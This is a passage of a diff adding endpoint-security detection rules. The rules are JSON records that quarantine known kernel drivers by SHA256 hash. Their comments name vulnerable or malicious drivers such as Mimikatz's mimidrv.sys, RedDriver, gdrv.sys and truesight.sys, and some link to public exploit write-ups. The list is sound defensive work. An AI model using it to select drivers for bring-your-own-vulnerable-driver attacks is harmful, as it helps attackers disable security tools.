+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616739Z",
+ "creation_date": "2026-03-23T11:45:29.616741Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616746Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b4cbd2bc16071a1868597ec86857dba1140f981e3e943b0857341daffff4e69",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a057a680-14a8-5655-9041-638f08c63463",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831180Z",
+ "creation_date": "2026-03-23T11:45:30.831182Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831188Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14dd5543656d683dd6eaef643ac0e3b4e1eb1348db18d6109a6b1b75fe1dbc13",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a062e544-41ef-5a13-90ba-b767b319f5cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832334Z",
+ "creation_date": "2026-03-23T11:45:30.832336Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832341Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1fb086cf89933281486efa575a9412e496c99dbe1106ea6c48b077be389f92e4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a06de8ad-5f20-5428-b205-e3f0e17f7b44",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143528Z",
+ "creation_date": "2026-03-23T11:45:31.143530Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143535Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc608516ecc4d8a265b066bd2f1a0178e4f2ab01dabec1e516b5840591c24965",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a07b3901-ca6b-53d1-afd4-65a39ecf83e6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970483Z",
+ "creation_date": "2026-03-23T11:45:29.970487Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970495Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "627e13da6a45006fff4711b14754f9ccfac9a5854d275da798a22f3a68dd1eaa",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0828a38-d583-599b-b9ac-3d5579cec9c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616168Z",
+ "creation_date": "2026-03-23T11:45:29.616170Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616175Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad6360cee0b1b293be38348f0f9deb7221e205516524f437aaf8f468b308cb4e",
+ "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0878cc9-d25b-5a4b-8104-7f8513246133",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824459Z",
+ "creation_date": "2026-03-23T11:45:30.824463Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824472Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ddd03e6455d92c7ef357f2834d70593ce65730306338a574416d9b439e2c3f0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0950a8e-9b78-5b8b-9367-a9a8a8a86e4a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985850Z",
+ "creation_date": "2026-03-23T11:45:29.985852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985857Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87565ff08a93a8ff41ea932bf55dec8e0c7e79aba036507ea45df9d81cb36105",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0a72fcb-873d-543f-ba98-7723f274ca7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811746Z",
+ "creation_date": "2026-03-23T11:45:31.811748Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811754Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "50f6c853251603e51534830d1d5faeb98ba638eafdb8d3cc4c49d56e28724325",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0a81360-2cbb-5274-9d86-677ae3f95e89",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605448Z",
+ "creation_date": "2026-03-23T11:45:29.605450Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605456Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6827cd3a8f273a66ecc33bb915df6c7dea5cc1b8134b0c348303ef50db33476",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0aa932b-78f9-580e-aa70-ca48c23f1b05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609021Z",
+ "creation_date": "2026-03-23T11:45:29.609023Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609029Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ce40a2cdd3f45c7632b858e8089ddfdd12d9acb286f2015a4b1b0c0346a572c",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0aec560-9bf9-5287-adb7-0319837d9216",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463069Z",
+ "creation_date": "2026-03-23T11:45:30.463073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463081Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "21617210249d2a35016e8ca6bd7a1edda25a12702a2294d56010ee8148637f5a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0b5f422-34a6-5344-b3d5-9fa1fd109a5d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483468Z",
+ "creation_date": "2026-03-23T11:45:31.483472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9866199215604d3739dd8e240b802424f9da097ead62d424c5af3cac21597ead",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0be8b1b-7b35-5818-b139-3e6b94ca5dad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608951Z",
+ "creation_date": "2026-03-23T11:45:29.608953Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608958Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff6729518a380bf57f1bc6f1ec0aa7f3012e1618b8d9b0f31a61d299ee2b4339",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0c0be80-3402-5d00-b21f-90a4b55ac2bc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825193Z",
+ "creation_date": "2026-03-23T11:45:31.825196Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825204Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d66bc8d2614a775eabcf0a9c51bcde2f9037dafe20f0155eec87abecd8eeccab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0c66ed2-d510-57ed-8269-ab9fb2dd21ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489802Z",
+ "creation_date": "2026-03-23T11:45:31.489805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489813Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6278724ed1c5287475fbd8888527160af10c3d83b610f0b058c1701f5aeda069",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0e315b9-561a-5e15-bf8a-dd97ac97a4e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606759Z",
+ "creation_date": "2026-03-23T11:45:29.606761Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606767Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2028156ea5a202f5fa9462646f3bffa0c01ac9c2e5cf6fa4df55bf38a47ac8da",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0e47ec1-a3e1-554a-a440-e717cdcf2c51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464815Z",
+ "creation_date": "2026-03-23T11:45:30.464818Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464826Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7bccc6f38403def4690e00a0b31eda05973d82be8953a3379e331658c51b231",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0ead3fd-f628-5dce-9166-fbdc39f4e016",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975078Z",
+ "creation_date": "2026-03-23T11:45:29.975080Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77955af8a8bcea8998f4046c2f8534f6fb1959c71de049ca2f4298ba47d8f23a",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0eea5ac-8281-5f75-9b04-fdf362b87d08",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155223Z",
+ "creation_date": "2026-03-23T11:45:31.155225Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155231Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c8f95af644c5377d68503cee0ac723150e22bfb5717921fe9998bc0fd6de479",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0eec88d-5c71-5911-9518-68ccd55c3699",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827712Z",
+ "creation_date": "2026-03-23T11:45:31.827714Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827720Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e42b99a85e42eb6785ae7c45ab7f4104bc729498bb224124b3e45676ce2da08",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0fcece0-44fb-58c4-add7-1d6a503cebc1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611659Z",
+ "creation_date": "2026-03-23T11:45:29.611661Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611667Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "653601cf8c3c2c4b778f9025d4e964c887966cc3216bb35a73a3ae75477b4476",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a133284a-a291-5215-8df2-0a854e664a24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969257Z",
+ "creation_date": "2026-03-23T11:45:29.969259Z",
+ "enabled": true,
